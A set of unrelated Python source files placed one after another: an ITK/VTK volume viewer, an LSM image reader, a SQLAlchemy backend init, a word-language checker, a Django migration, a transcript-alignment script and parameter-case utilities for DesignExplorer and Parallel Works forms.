        self.__outlineActor__ = None
        self.AdaptColorAndOpacity(0, 255)
        if input :
            self.SetInput(input)
            self.AdaptColorAndOpacity()
    def Render(self):
        # Force a redraw of the render window.
        self.__widget__.GetRenderWindow().Render()
    def GetWidget(self) :
        return self.__widget__
    def GetRenderer(self) :
        return self.__ren__
    def GetConverter(self) :
        return self.__itkvtkConverter__
    def GetVolumeMapper(self) :
        return self.__volumeMapper__
    def GetVolume(self) :
        return self.__volume__
    def GetVolumeProperty(self) :
        return self.__volumeProperty__
    def Show(self) :
        self.__widget__.show()
    def Hide(self) :
        self.__widget__.hide()
    def SetInput(self, input) :
        # Rebuild the ITK->VTK conversion pipeline for a new input image.
        import itk
        img = itk.image(input)
        self.__input__ = img
        if img :
            # Update to try to avoid to exit if a c++ exception is throwed
            # sadely, it will not prevent the program to exit later...
            # a real fix would be to wrap c++ exception in vtk
            img.UpdateOutputInformation()
            img.Update()
            # flip the image to get the same representation than the vtk one
            self.__flipper__ = itk.FlipImageFilter[img].New(Input=img)
            axes = self.__flipper__.GetFlipAxes()
            axes.SetElement(1, True)
            self.__flipper__.SetFlipAxes(axes)
            # change the spacing while still keeping the ratio to workaround vtk bug
            # when spacing is very small
            spacing_ = itk.spacing(img)
            normSpacing = []
            for i in range(0, spacing_.Size()):
                normSpacing.append( spacing_.GetElement(i) / spacing_.GetElement(0) )
            self.__changeInfo__ = itk.ChangeInformationImageFilter[img].New(self.__flipper__, OutputSpacing=normSpacing, ChangeSpacing=True)
            # now really convert the data
            self.__itkvtkConverter__ = itk.ImageToVTKImageFilter[img].New(self.__changeInfo__)
            self.__volumeMapper__.SetInput(self.__itkvtkConverter__.GetOutput())
            # needed to avoid warnings
            # self.__itkvtkConverter__.GetOutput() must be callable
            import vtk
            if not self.__outline__ :
                self.__outline__ = vtk.vtkOutlineFilter()
                self.__outline__.SetInput(self.__itkvtkConverter__.GetOutput())
                self.__outlineMapper__ = vtk.vtkPolyDataMapper()
                self.__outlineMapper__.SetInput(self.__outline__.GetOutput())
                self.__outlineActor__ = vtk.vtkActor()
                self.__outlineActor__.SetMapper(self.__outlineMapper__)
                self.__ren__.AddActor(self.__outlineActor__)
            else :
                self.__outline__.SetInput(self.__itkvtkConverter__.GetOutput())
        self.Render()
    def __call__(self, input) :
        """ a short cut for SetInput()"""
        self.SetInput( input )
    def GetInput(self):
        return self.__input__
    def AdaptColorAndOpacity(self, minVal=None, maxVal=None):
        # Missing bounds default to the image's actual scalar range.
        if minVal == None or maxVal == None :
            m, M = self.GetRange()
            if minVal == None :
                minVal = m
            if maxVal == None :
                maxVal = M
        self.AdaptOpacity(minVal, maxVal)
        self.AdaptColor(minVal, maxVal)
    def AdaptOpacity(self, minVal=None, maxVal=None) :
        import vtk
        if minVal == None or maxVal == None :
            m, M = self.GetRange()
            if minVal == None :
                minVal = m
            if maxVal == None :
                maxVal = M
        # Linear opacity ramp between the configured min/max opacities.
        opacityTransferFunction = vtk.vtkPiecewiseFunction()
        opacityTransferFunction.AddPoint(minVal, self.__MinOpacity__)
        opacityTransferFunction.AddPoint(maxVal, self.__MaxOpacity__)
        self.__volumeProperty__.SetScalarOpacity(opacityTransferFunction)
    def AdaptColor(self, minVal=None, maxVal=None):
        import vtk
        if minVal == None or maxVal == None :
            m, M = self.GetRange()
            if minVal == None :
                minVal = m
            if maxVal == None :
                maxVal = M
        # HSV ramp: black -> blue -> green -> orange -> red across the range.
        # NOTE(review): the intermediate points use (maxVal-minVal)*f rather
        # than minVal+(maxVal-minVal)*f — off when minVal != 0; confirm intent.
        colorTransferFunction = vtk.vtkColorTransferFunction()
        colorTransferFunction.AddHSVPoint(minVal, 0.0, 0.0, 0.0)
        colorTransferFunction.AddHSVPoint((maxVal-minVal)*0.25, 0.66, 1.0, 1.0)
        colorTransferFunction.AddHSVPoint((maxVal-minVal)*0.5, 0.44, 1.0, 1.0)
        colorTransferFunction.AddHSVPoint((maxVal-minVal)*0.75, 0.22, 1.0, 1.0)
        colorTransferFunction.AddHSVPoint(maxVal, 0.0, 1.0, 1.0)
        self.__volumeProperty__.SetColor(colorTransferFunction)
        self.Render()
    def GetRange(self) :
        # Scalar range of the converted VTK image (forces a pipeline update).
        conv = self.GetConverter()
        conv.Update()
        return conv.GetOutput().GetScalarRange()
    def GetMaxOpacity(self) :
        return self.__MaxOpacity__
    def GetMinOpacity(self) :
        return self.__MinOpacity__
    def SetMaxOpacity(self, val) :
        self.__MaxOpacity__ = val
        self.AdaptColorAndOpacity()
    def SetMinOpacity(self, val) :
        self.__MinOpacity__ = val
        self.AdaptColorAndOpacity()
import itkExtras
class lsm( itkExtras.pipeline ):
    """ Use vtk to import LSM image in ITK.
    """
    # Pipeline: vtkLSMReader -> vtkImageCast -> VTKImageToImageFilter ->
    # ChangeInformationImageFilter (spacing converted to micrometers).
    def __init__(self, fileName=None, channel=0, ImageType=None ):
        from vtk import vtkLSMReader, vtkImageCast
        import itk
        itk.pipeline.__init__(self)
        # if ImageType is None, give it a default value
        # this is useful to avoid loading Base while loading this module
        if ImageType == None:
            ImageType = itk.Image.UC3
        # remove useless SetInput() method created by the constructor of the pipeline class
        # del self.SetInput
        # set up the pipeline
        self.connect( vtkLSMReader() )
        self.connect( vtkImageCast() )
        PType = itk.template(ImageType)[1][0]
        if PType == itk.UC:
            self[-1].SetOutputScalarTypeToUnsignedChar()
        elif PType == itk.US:
            self[-1].SetOutputScalarTypeToUnsignedShort()
        self.connect( itk.VTKImageToImageFilter[ImageType].New() )
        self.connect( itk.ChangeInformationImageFilter[ImageType].New( ChangeSpacing=True ) )
        # and configure the pipeline
        if fileName:
            self.SetFileName( fileName )
            # NOTE(review): SetChannel() triggers an Update() on the reader, so
            # it is nested under the fileName guard — confirm original nesting.
            self.SetChannel( channel )
    def SetFileName( self, fileName ):
        self[0].SetFileName( fileName )
        self[0].Update()
        self.UpdateSpacing()
        self[-1].UpdateLargestPossibleRegion()
    def SetChannel( self, channel ):
        self[0].SetUpdateChannel( channel )
        self[0].Update()
        self.UpdateSpacing()
        self.__channel__ = channel
        self[-1].UpdateLargestPossibleRegion()
        return self.GetChannelName( channel )
    def UpdateSpacing(self):
        # LSM voxel sizes are in meters; convert to micrometers for ITK.
        spacing = self[0].GetVoxelSizes()
        spacing = [ v * 1e6 for v in spacing ]
        self[-1].SetOutputSpacing( spacing )
    def GetFileName(self):
        return self[0].GetFileName()
    def GetChannel(self):
        return self.__channel__
    def GetNumberOfChannels(self):
        return self[0].GetNumberOfChannels()
    def GetChannelName(self, channel=None):
        # Defaults to the currently selected channel.
        if channel == None:
            channel = self.GetChannel()
        return self[0].GetChannelName( channel )
del itkExtras
|
from .client import AlchemyClient, AlchemyDialect
from .database import AlchemyDatabase, AlchemyDatabaseSchema, AlchemyTable
from .datatypes import schema_from_table, table_from_schema, to_sqla_type
from .query_builder import AlchemyQueryBuilder, build_ast, to_sqlalchemy
from .registry import (
fixed_arity,
get_sqla_table,
infix_op,
reduction,
sqlalchemy_operation_registry,
sqlalchemy_window_functions_registry,
unary,
varargs,
variance_reduction,
)
from .translator import AlchemyContext, AlchemyExprTranslator
# Public API of the alchemy backend package.
# CONSISTENCY FIX: 'AlchemyContext' was listed twice; duplicate removed.
__all__ = (
    'AlchemyExprTranslator',
    'AlchemyContext',
    'AlchemyQueryBuilder',
    'AlchemyDialect',
    'AlchemyClient',
    'AlchemyTable',
    'AlchemyDatabaseSchema',
    'AlchemyDatabase',
    'sqlalchemy_operation_registry',
    'sqlalchemy_window_functions_registry',
    'reduction',
    'variance_reduction',
    'fixed_arity',
    'unary',
    'infix_op',
    'get_sqla_table',
    'to_sqla_type',
    'schema_from_table',
    'table_from_schema',
    'varargs',
    'to_sqlalchemy',
    'build_ast',
)
|
import logging
import os
import random
import re
from logrec.dataprep.split.samecase.splitter import load_english_dict
logger = logging.getLogger(__name__)
class LanguageChecker(object):
    """Classifies words as English / non-English using dictionary files.

    A word is "non-English" if it contains non-ASCII characters or its
    lowercase form appears in the loaded non-English word set.
    """
    # Words shorter than this are never added to the non-English set.
    DEFAULT_MIN_CHARS_TO_BE_NON_ENG = 4

    def __init__(self, path_to_general_english_dict, path_to_non_eng_dicts):
        logger.info("Loading english dictionary")
        english_general_dict = load_english_dict(path_to_general_english_dict)
        logger.info("Loading non-english dictionaries")
        self.non_eng_word_set = self.__create_non_eng_word_set(
            path_to_non_eng_dicts, english_general_dict,
            LanguageChecker.DEFAULT_MIN_CHARS_TO_BE_NON_ENG)

    def in_non_eng_word_set(self, word):
        """True if *word* (as given) is in the non-English word set."""
        return word in self.non_eng_word_set

    def is_non_eng(self, word):
        """True if *word* is non-ASCII or its lowercase form is non-English."""
        return not self.__isascii(word) or self.in_non_eng_word_set(word.lower())

    def calc_lang_stats(self, word_list, include_sample=False):
        """Return (total, total_uq, non_eng, non_eng_uq, ratio, uq_ratio[, sample])."""
        non_eng_unique = set()
        non_eng = 0
        for word in word_list:
            if self.is_non_eng(word):
                non_eng += 1
                non_eng_unique.add(word)
        total = len(word_list)
        total_uq = len(set(word_list))
        non_eng_uq = len(non_eng_unique)
        result = total, total_uq, non_eng, non_eng_uq \
            , float(non_eng) / total if total != 0 else 0 \
            , float(non_eng_uq) / total_uq if total_uq != 0 else 0
        if include_sample:
            # BUG FIX: random.sample() no longer accepts a set (TypeError on
            # Python 3.11+); sample from a sorted list of the same words.
            sample = random.sample(sorted(non_eng_unique),
                                   min(len(non_eng_unique), 15))
            result = (*result, ",".join(sample))
        return result

    def __create_non_eng_word_set(self, dicts_dir, english_dict, min_chars):
        """Collect non-English words from every dictionary file in *dicts_dir*."""
        dict_files_names = [f for f in os.listdir(dicts_dir)]
        non_eng_words = set()
        for dict_file_name in dict_files_names:
            with open(os.path.join(dicts_dir, dict_file_name), 'r') as f:
                for line in f:
                    word = re.split("[/\t]", line)[0]  # splitting by tabs and slashes
                    word = word.lower()
                    # BUG FIX: guard against empty entries before peeking at
                    # the last character (word[-1] raised IndexError on "").
                    if word.endswith('\n'):
                        word = word[:-1]
                    if word not in english_dict and len(word) >= min_chars:
                        non_eng_words.add(word)
        return non_eng_words

    def __isascii(self, str):
        # EAFP: attempting the ASCII encode is the simplest portable check.
        try:
            str.encode('ascii')
            return True
        except UnicodeEncodeError:
            return False
|
# Generated by Django 3.1.6 on 2021-02-19 12:48
from django.db import migrations, models
class Migration(migrations.Migration):
    """Create the ``our_team`` table backing the OurTeam model."""

    dependencies = [
        ('home', '0006_auto_20210219_1215'),
    ]

    operations = [
        migrations.CreateModel(
            name='OurTeam',
            fields=[
                ('id', models.AutoField(primary_key=True, serialize=False)),
                ('name', models.CharField(max_length=255)),
                ('designation', models.CharField(default=None, max_length=50, null=True)),
                ('profile_pic', models.CharField(max_length=1000, null=True)),
                ('facebook_url', models.CharField(max_length=1000, null=True)),
                ('tweet_url', models.CharField(max_length=1000, null=True)),
                ('created_date', models.DateTimeField(auto_now_add=True)),
            ],
            options={
                # Explicit table name instead of the default app_model name.
                'db_table': 'our_team',
                'managed': True,
            },
        ),
    ]
|
def regras(x):
    """Filter rule: numbers >= 100 are dropped (None is falsy for filter());
    even numbers below 100 pass through unchanged, odd ones are doubled."""
    if x >= 100:
        return None
    return x if x % 2 == 0 else x + x
lista = [100, 200, 1000, 3000, 2, 3, 4, 5, 6, 7, 8]
# filter() keeps the original elements for which regras() returns a truthy
# value, i.e. the numbers below 100 (answer to the question linked below).
print(list(filter(regras,lista)))
#https://pt.stackoverflow.com/q/321682/101
|
import re
# import time
import datetime
def to_list(file):
    """Read a UTF-8 text file and return its lines (trailing newlines kept).

    Uses a context manager so the handle is always closed — the original
    opened the file and never closed it.
    """
    with open(file, 'rt', encoding='UTF-8') as f:
        return f.readlines()
# Align unpunctuated transcript lines against a punctuated reference text:
# for every ".trn" line, find the matching punctuated line and write it out
# with the original utterance id.
w_punct = to_list('broadcast_w_punct_u_double.txt')
# Keep a reference to the full list; w_punct itself is shrunk as matches
# are consumed and restored from backup after a miss.
backup = w_punct
f = open('SubtTV_2017_01_03_pcm.list.trn', 'rt', encoding = 'UTF-8')
new_f = open('SubtTV_2017_01_03_pcm.list.punct.trn', 'wt', encoding = 'UTF-8')
not_found = open('SubtTV_2017_not_found', 'wt', encoding = 'UTF-8')
print(datetime.datetime.now())
while True:
    # counter = time.time()
    line = f.readline()
    if not line : break
    # Each line is "<file name> :: <utterance text>".
    file_name = line.split(' :: ')[0]
    org_txt = line.split(' :: ')[1][:-1]
    flag = True
    # Space-free version for substring matching against the reference.
    org_txt_sub = re.sub('[ ]', '', org_txt)
    first_word = org_txt.split(' ')[0]
    # NOTE(review): despite its name this is the LAST word of the utterance.
    second_word = org_txt.split(' ')[-1]
    # print('org : ', org_line_sub)
    for cmp_line in w_punct:
        cmp_txt = cmp_line[:-1]
        # Strip punctuation and spaces from the reference line before comparing.
        cmp_txt_sub = re.sub('[,.?!~ ]', '', cmp_txt)
        # print('cmp : ', cmp_line_sub)
        if org_txt_sub in cmp_txt_sub:
            # Cut the punctuated span from first word up to the end of the
            # last word of the utterance.
            start = cmp_txt.find(first_word)
            check = cmp_txt.find(second_word, start + len(first_word))
            end = cmp_txt.find(' ', check)
            if end == -1:
                new_f.write(file_name + ' :: ' + cmp_txt[start:] + '\n')
            else:
                new_f.write(file_name + ' :: ' + cmp_txt[start:end] + '\n')
            flag = False
            # print('done : ', time.time() - counter)
            # Resume scanning after the consumed reference line next time.
            w_punct = w_punct[w_punct.index(cmp_line)+1:]
            break
    if flag:
        # No reference line matched: log the utterance and rescan everything.
        not_found.write(line)
        w_punct = backup
        # print('fail : ', time.time() - counter)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
logger.addHandler(logging.NullHandler())
from . import exceptions
from .agent import Agent
from .constants import ValueType
from .mib import MIBMeta, MIBUpdater, MIBEntry, ContextualMIBEntry, SubtreeMIBEntry
|
from Operators.ExampleTextRecognizeOperator.TextRecognizeOperator import GeneralCRNN
|
import math
import sys
import itertools as it
import warnings
import re
from collections import OrderedDict
import data_IO
def readCases(paramsFile, namesdelimiter=";", valsdelimiter="_",
              paramsdelimiter = "\n", withParamType = True):
    """Read a .run parameter file and expand it into the full factorial case list.

    Each entry looks like "name;type;values" (or "name;values" when
    withParamType is False); data_IO.parse_pval turns the value field into a
    list of values.  Returns (cases, varNames, pTypes) where cases is the
    cartesian product of all value lists, one [{name: value}, ...] per case.
    """
    with open(paramsFile) as f:
        content = f.read().split(paramsdelimiter)
    # NOTE(review): after splitting on "\n" a trailing entry would be ""
    # rather than "\n", so this guard looks like it never fires — confirm.
    if content[-1] == "\n":
        del content[-1]
    # Replace non-ascii characters with space
    content = data_IO.remove_non_ascii_list(content)
    pvals = OrderedDict({})
    pTypes = OrderedDict({})
    for x in content:
        # Entries containing "null" or empty lines are skipped entirely.
        if "null" not in x and x != "":
            pname = x.split(namesdelimiter)[0]
            if withParamType:
                pType = x.split(namesdelimiter)[1]
                pval = x.split(namesdelimiter)[2]
            else:
                pval = x.split(namesdelimiter)[1]
            pval = data_IO.parse_pval(pval)
            pvals[pname] = pval
            if withParamType:
                pTypes[pname] = pType
            else:
                pTypes[pname] = None
    varNames = list(pvals.keys())
    # Cartesian product over all parameter value lists -> one case per combo.
    cases = [[{varName: val} for varName, val in zip(varNames, prod)] for prod in
             it.product(*(pvals[varName] for varName in varNames))]
    return cases, varNames, pTypes
def correct_input_variable_names(cases):
    """Sanitize parameter names so they work as plain identifiers.

    ',', '.', '(', ')', '[' and ']' become '_', ':' is removed and '/' is
    spelled out as '_div_'.  The per-parameter dicts are re-keyed in place
    and gathered into a new list of cases.
    """
    replacements = [(',', '_'), ('.', '_'), ('(', '_'), (')', '_'),
                    ('[', '_'), (']', '_'), (':', ''), ('/', '_div_')]
    all_cases_corrected = []
    for case in cases:
        corrected_case = []
        for pair in case:
            old_name = next(iter(pair))
            new_name = old_name
            for bad, good in replacements:
                new_name = new_name.replace(bad, good)
            pair[new_name] = pair.pop(old_name)
            corrected_case.append(pair)
        all_cases_corrected.append(corrected_case)
    return all_cases_corrected
def generate_caselist(cases, pnameValDelimiter='=', paramValPairDelimiter=","):
    """Render each case as "name=value,name=value" (no trailing delimiter).

    The original stripped the trailing delimiter with ``case[:-1]``, which
    removes only one character and therefore corrupts the output for
    multi-character pair delimiters; joining avoids that entirely.
    """
    caselist = []
    for c in cases:
        pairs = []
        for p in c:
            pname = list(p.keys())[0]
            pairs.append(pname + pnameValDelimiter + p[pname])
        caselist.append(paramValPairDelimiter.join(pairs))
    return caselist
def getParamTypeFromfileAddress(dataFileAddress):
    """Map a parameter-file extension to its kind.

    '.run' -> 'paramFile', '.list' -> 'listFile'; any other extension is a
    fatal configuration error and terminates the program.
    """
    if dataFileAddress.endswith('.list'):
        return 'listFile'
    if dataFileAddress.endswith('.run'):
        return 'paramFile'
    print('Error: parameter/case type cannot be set. Please provide .list or .run file. ')
    sys.exit(1)
def readcasesfromcsv(casesFile, paramValDelim=',', paramPairDelim=','):
    """Read cases from a CSV file.

    Each line holds alternating parameter names and values; the return value
    is a list of cases, each a list of single-entry {name: value} dicts.

    The file is opened with a context manager so the handle is closed even
    when parsing raises (the original leaked it on error), and the unused
    enumerate counters were dropped.
    """
    cases = []
    with open(casesFile, "r") as f:
        for line in f:
            # Flatten the line into [name, value, name, value, ...]
            data = []
            for paramValPair in line.split(paramPairDelim):
                data.extend(l.replace("\n", "") for l in paramValPair.split(paramValDelim))
            # Re-pair names with their values: ["a", "1", ...] -> ["a,1", ...]
            span = 2
            data = [paramValDelim.join(data[i:i + span]) for i in range(0, len(data), span)]
            case = [{v.split(paramValDelim)[0]: v.split(paramValDelim)[1]} for v in data]
            cases.append(case)
    return cases
def readParamsFile(paramsFile, paramValDelim=',', paramPairDelim=','):
    """Dispatch on the parameter-file type: .run files are parsed by
    readCases(), everything else by readcasesfromcsv()."""
    if getParamTypeFromfileAddress(paramsFile) == 'paramFile':
        return readCases(paramsFile)
    return readcasesfromcsv(paramsFile, paramValDelim, paramPairDelim)
def generateHeader(inputParamNames, outParamTables, outImgList):
    """Build the DesignExplorer CSV header line.

    Input names become "in:<name>", outputs "out:<name>[_<stat>]" and images
    "img:<name>", all comma separated.

    The original accumulated input names by '+='-ing strings onto a LIST,
    extending it character by character, then joined a char slice; this
    version joins the prefixed names directly (same result, readable).
    """
    num2statTable = {0: 'ave', 1: 'min', 2: 'max', 3: 'sd'}
    header = ",".join("in:" + varName for varName in inputParamNames)
    for paramNameStat in outParamTables:
        outStr = ",out:" + paramNameStat[0]
        # A stat code >= 0 appends the stat suffix (ave/min/max/sd).
        if paramNameStat[1] >= 0:
            outStr += "_" + num2statTable[paramNameStat[1]]
        header += outStr
    for imgName in outImgList:
        header += ",img:" + imgName
    return header
def convertListOfDicts2Dict(listOfDicts):
    """
    Merge a case's list of single-entry {param: value} dicts into one dict.
    """
    return {key: value for entry in listOfDicts for key, value in entry.items()}
def getParamNamesFromCase(case):
    """Return the sorted parameter names occurring in *case*."""
    merged = {}
    for pair in case:
        merged.update(pair)
    return sorted(merged)
def writeInputParamVals2caselist(cases, inputVarNames):
    """
    Add the values of input parameters for each case to caselist
    """
    caselist = []
    for c in cases:
        merged = {}
        for pair in c:
            merged.update(pair)
        caselist.append(",".join(merged[name] for name in inputVarNames))
    return caselist
def genOutputLookupTable(outParamsList):
    """Turn entries like 'pressure(ave)' into [name, statCode] pairs.

    Entries without a '(stat)' suffix map to statCode -1 (read from another
    file rather than the metric csv).
    """
    stat2numTable = {'ave': 0, 'min': 1, 'max': 2, 'sd': 3}
    lookupTable = []
    for param in outParamsList:
        open_paren = param.find("(")
        if open_paren > 0:
            name = param[:open_paren].lstrip()
            stat = param[open_paren + 1:param.find(")")]
            lookupTable.append([name, stat2numTable[stat.lower()]])
        else:
            lookupTable.append([param, -1])
    return lookupTable
def parseOutputType(statStr, isParaviewMetric):
    """Parse a comma-separated stat flag ('ave,max', 'all', 'none', ...) into
    the numeric stat codes used downstream.

    Non-Paraview metrics always map to -1 per requested entry; an unknown
    stat for a Paraview metric emits a warning and contributes nothing.
    'none'/'image' yield an empty list.
    """
    stat2numTable = OrderedDict([('ave', 0), ('min', 1), ('max', 2), ('sd', 3)])
    requested = [token.strip().lower() for token in statStr.split(",")]
    if requested[0].lower() in {"none", "image"}:
        return []
    if requested[0] == "all":
        requested = list(stat2numTable.keys())
    statList = []
    for token in requested:
        if not isParaviewMetric:
            statList.append(-1)
        elif token in stat2numTable:
            statList.append(stat2numTable[token])
        else:
            warningMsg = 'Please check the format of stat flag ' \
                         '("{}" is not acceptable for Paraview metrics). ' \
                         'Accepted values are: "none", "image", "all", "{}". ' \
                         'Setting stat flag to "none". ' \
                         .format(token, '", "'.join(list(stat2numTable.keys())))
            warnings.warn(warningMsg)
    return statList
def getOutputParamsFromKPI(kpihash, orderPreservedKeys, ignoreSet):
    """Collect [kpi, statCode] rows for every KPI whose stats should be
    extracted, preserving the given key order and skipping *ignoreSet*.

    NOTE(review): ``outputParams`` is populated but never returned — only
    ``lookupTable`` is; confirm the extra list is intentional.
    """
    outputParams= []
    lookupTable = []
    for kpi in orderPreservedKeys:
        if kpi not in ignoreSet:
            metrichash = kpihash[kpi]
            # Paraview metrics are skipped entirely unless stat extraction
            # is switched on for them.
            if data_IO.str2bool(metrichash['IsParaviewMetric']):
                if not data_IO.str2bool(metrichash['extractStats']):
                    continue
            outputTypeList = parseOutputType(metrichash['DEXoutputFlag'],
                                     data_IO.str2bool(metrichash['IsParaviewMetric']))
            for outputType in outputTypeList:
                outputParams.append(kpi)
                lookupTable.append([kpi, outputType])
    return lookupTable
def getOutImgsFromKPI(kpihash, orderPreservedKeys):
    """Collect the image (and animation) titles plus their file-name
    templates for every KPI producing a picture, in key order.

    Returns (imgTitles, imgNames) as parallel lists.
    """
    imgTitles= []
    imgNames = []
    for kpi in orderPreservedKeys:
        metrichash = kpihash[kpi]
        isParaviewMetric = data_IO.str2bool(metrichash["IsParaviewMetric"])
        # Only Paraview metrics, or metrics explicitly flagged "image",
        # contribute pictures.
        if not (isParaviewMetric or metrichash['DEXoutputFlag'].lower() == "image"):
            continue
        imageName = metrichash['imageName']
        # NOTE(review): "None" is compared as a string — the hash appears
        # to store the literal text "None" rather than the None object.
        if imageName != "None":
            imgTitles.append(kpi)
            imgNames.append(imageName)
        animation = data_IO.str2bool(metrichash['animation'])
        if animation:
            imgTitles.append(kpi+'_animation')
            imgNames.append(metrichash['animationName'])
    return imgTitles, imgNames
def getOutputParamsStatListOld(outputParamsFileAddress, outputParamNames,
                               stats2include=('ave', 'min', 'max')):
    """Build the list of output-parameter entries ("name(stat)").

    If *outputParamsFileAddress* is given, the desired outputs are read from
    that file: the first line names the parameters extracted from the metric
    csv files (filtered against *outputParamNames*), and each following
    non-empty line describes an output read from another file, e.g.
        pressure_drop;results/case_{:d}_pressure_drop.txt;;" ";1
    Otherwise every name in *outputParamNames* is combined with each stat in
    *stats2include*.

    The stats default is now a tuple instead of a list, avoiding the shared
    mutable-default pitfall; behaviour is unchanged.
    """
    if outputParamsFileAddress:
        foutParams = data_IO.open_file(outputParamsFileAddress, 'r')
        allDesiredOutputs = foutParams.read().splitlines()
        # First line: parameters to read from the metric extraction csv files.
        outParamsFromCSV = allDesiredOutputs[0].split(',')
        # Keep only entries whose base name exists in outputParamNames.
        outParamsList = [param for param in outParamsFromCSV
                         if param[:param.find("(")] in outputParamNames]
        # Remaining lines: outputs read from other files
        # (format: outputName;outputFileNameTemplate;outputFlag;delimiter;locationInFile).
        outParamsFromOtherFiles = [line.split(";")[0]
                                   for line in allDesiredOutputs[1:] if line]
        outParamsList.extend(outParamsFromOtherFiles)
    else:
        outParamsList = [paramName + "(" + stat + ")"
                         for paramName in outputParamNames
                         for stat in stats2include]
    return outParamsList
def readOutParamsForCase(paramTable, csvTemplateName, caseNumber, kpihash,
                         add_sim_status_param=False):
    """Read the extracted output values for a single case.

    paramTable rows are [paramName, statCode]: statCode >= 0 reads the value
    from the Paraview metric-extraction csv (csvTemplateName formatted with
    caseNumber), -1 reads it from the result file described in
    kpihash[paramName], and -2 is the placeholder for the simulation-status
    column.  Any read failure yields NaN and flags the case as not converged.

    Returns the values as strings; when add_sim_status_param is True a final
    "1"/"0" convergence flag is appended.
    """
    outParamsList = []
    # Read values from the Metrics Extraction file first
    readMEXCSVFile = False
    if any(param[1] >= 0 for param in paramTable):
        readMEXCSVFile = True
    if readMEXCSVFile:
        PVcsvAddress = csvTemplateName.format(caseNumber)
    solution_converged = True
    for param in paramTable:
        if param[1] >= 0: # Read the parameters from a Mex (Paraview) .csv file
            try:
                fPVcsv = data_IO.open_file(PVcsvAddress, 'r')
                param_icase = data_IO.read_float_from_file_pointer(
                    fPVcsv, param[0], ',', param[1])
                fPVcsv.close()
            except (IOError, ValueError):
                print('Error reading {} from file {}. Setting value to '
                      'NaN'.format(param[0], PVcsvAddress))
                solution_converged = False
                param_icase = float('NaN')
        elif param[1] == -1: # Read parameters from other files if provided
            metrichash = kpihash[param[0]]
            dataFile = metrichash['resultFile'].format(caseNumber)
            dataFileParamFlag = metrichash['DEXoutputFlag']
            dataFileDelimiter = metrichash['delimiter']
            # An empty delimiter means "split on any whitespace".
            if not dataFileDelimiter:
                dataFileDelimiter = None
            locnInOutFile = int(metrichash['locationInFile']) - 1
            # Start from 0
            try:
                fdataFile = data_IO.open_file(dataFile, 'r')
                param_icase = data_IO.read_float_from_file_pointer(
                    fdataFile, dataFileParamFlag, dataFileDelimiter, locnInOutFile)
                fdataFile.close()
            except (IOError, ValueError):
                print('Error reading {} from file {}. Setting value to '
                      'NaN'.format(dataFileParamFlag,dataFile))
                solution_converged = False
                param_icase = float('NaN')
        elif param[1] == -2: # This is for outputting simulation status
            continue
        outParamsList.append(str(param_icase))
    if add_sim_status_param:
        if solution_converged:
            outParamsList.append(str(1))
        else:
            outParamsList.append(str(0))
    return outParamsList
def writeOutParamVals2caselist(cases, csvTemplateName, paramTable, caselist, kpihash):
    """Append the extracted output metrics (plus the simulation-status
    column) to each case's row of *caselist*."""
    for icase, _ in enumerate(cases):
        values = readOutParamsForCase(paramTable, csvTemplateName,
                                      icase, kpihash,
                                      add_sim_status_param=True)
        caselist[icase] += "," + ",".join(values)
    return caselist
def writeImgs2caselist(cases, imgNames, basePath, pngsDirRel2BasePath, caselist):
    """Append the per-case image paths (",<base><pngsDir><image>") to each
    row of *caselist*."""
    for icase, _ in enumerate(cases):
        pieces = []
        for template in imgNames:
            resolved = template.format(icase)
            pieces.append("," + basePath + pngsDirRel2BasePath.format(icase) +
                          resolved.format(icase))
        caselist[icase] += "".join(pieces)
    return caselist
def writeDesignExplorerCSVfile(deCSVFile, header, caselist):
    """Write the DesignExplorer csv: the header line, then one line per case."""
    out = data_IO.open_file(deCSVFile, 'w')
    out.write(header + '\n')
    out.write("\n".join(caselist) + '\n')
    out.close()
def mergeParamTypesParamValsDict(paramTypes, paramVals):
    """Zip per-parameter types and values into {name: {'value': v, 'type': t}}."""
    return {name: {'value': paramVals[name], 'type': ptype}
            for name, ptype in paramTypes.items()}
def merge_cases(case_1, case_2):
    """Concatenate every case of *case_1* with every case of *case_2*
    (cartesian product of the two case lists)."""
    return [left + right for left, right in it.product(case_1, case_2)]
def writeXMLPWfile_old(case, paramTypes, xmlFile, helpStr = 'Whitespace delimited or range/step (e.g. min:max:step)',
                       paramUnits=[]):
    """Write the input section of the xml file for generating input forms on the Parallel Works platform"""
    # NOTE(review): paramUnits=[] is a shared mutable default; it is only
    # read here, but a dict/None default would be safer.
    paramVals = convertListOfDicts2Dict(case)
    # sort the keys by parameter types:
    paramsBytype = {}
    paramsSortedBytype = sorted(paramTypes.items())
    paramsTypeVal = mergeParamTypesParamValsDict(paramTypes, paramVals)
    paramsTypeVal = OrderedDict(sorted(paramsTypeVal.items()))
    print(list(paramVals.keys()))
    unitStr = ""
    f = data_IO.open_file(xmlFile, "w")
    # Write the xml file header:
    f.write("<tool id=\'test_params_forms\' name=\'test_params_forms\'> \n"
            "\t<command interpreter=\'swift\'>main.swift</command> \n"
            "\t<inputs> \n")
    paramTypes = set(paramTypes.values())
    # Write the parameters of each type under a section
    expanded = 'true'
    for sectionName in paramTypes:
        # Write the section header
        # e.g. <section name='design_space' type='section' title='Cyclone Geometry Parameter Space' expanded='true'>
        f.write("\t\t<section name=\'" + sectionName + "\' type=\'section\' title='" +
                sectionName.capitalize() +" Parameters\' expanded=\'" + expanded + "\'> \n")
        # Only the first section starts expanded.
        expanded = 'false'
        for paramName in paramsTypeVal:
            paramDict = paramsTypeVal[paramName]
            if paramUnits:
                if paramUnits[paramName]:
                    unitStr = " (" + paramUnits[paramName] + ")"
                else:
                    unitStr = ""
            if paramDict['type'] == sectionName:
                pVal = paramDict['value']
                # "CamelCase" -> "Camel Case" for a readable form label.
                paramLabel = re.sub(r"(\w)([A-Z])", r"\1 \2", paramName)
                paramLabel = data_IO.upperfirst(paramLabel)
                f.write("\t\t\t<param name=\'"+ paramName + "\' type=\'text\' value=\'" + str(pVal) +
                        "\' label=\'" + paramLabel + unitStr +"\' help=\'" + helpStr + "\' width=\'33.3%\' argument=\'"
                        + sectionName + "\'>\n")
                f.write("\t\t\t</param>\n")
        f.write("\t\t</section> \n")
    f.write("\t</inputs> \n")
    f.write("</tool> \n")
    f.close()
    # NOTE(review): paramsBytype is never populated, so this always returns
    # an empty dict — confirm callers ignore the return value.
    return paramsBytype
def writeXMLPWfile(sample_case, param_types, xml_file,
                   help_text='Whitespace delimited or range/step (e.g. min:max:step)',
                   user_name='user',
                   workflow_name='workflow',
                   swift_script='main.swift'):
